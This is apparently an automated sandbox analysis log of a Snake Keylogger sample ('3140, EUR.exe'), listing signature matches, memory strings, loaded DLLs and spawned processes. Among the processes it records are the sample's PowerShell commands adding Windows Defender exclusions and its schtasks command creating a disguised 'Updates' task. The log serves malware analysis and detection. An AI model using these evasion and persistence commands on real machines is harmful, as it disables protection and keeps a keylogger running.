                    Source: 3140, EUR.exe, 00000000.00000000.1656247053.0000000000402000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 3140, EUR.exe
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 3140, EUR.exe
                    Source: 3140, EUR.exe, 00000000.00000002.1724176185.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3140, EUR.exe
                    Source: 3140, EUR.exe, 00000000.00000002.1743280560.0000000009FD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 3140, EUR.exe
                    Source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
                    Source: 3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 3140, EUR.exe
                    Source: 3140, EUR.exe, 00000008.00000002.4120197349.0000000001177000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 3140, EUR.exe
                    Source: 3140, EUR.exeBinary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
                    Source: 3140, EUR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3140, EUR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: lkuPOyvaWlIu.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, onTDHLANSwQB4GuLwN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, onTDHLANSwQB4GuLwN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, onTDHLANSwQB4GuLwN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 3140, EUR.exe, 00000000.00000002.1725784467.0000000000BD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OobeEnableRtpAndSigUpdates;.VBP
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/15@4/4
                    Source: C:\Users\user\Desktop\3140, EUR.exeFile created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
                    Source: C:\Users\user\Desktop\3140, EUR.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE737.tmpJump to behavior
                    Source: 3140, EUR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 3140, EUR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\3140, EUR.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 3140, EUR.exeReversingLabs: Detection: 47%
                    Source: 3140, EUR.exeVirustotal: Detection: 43%
                    Source: C:\Users\user\Desktop\3140, EUR.exeFile read: C:\Users\user\Desktop\3140, EUR.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
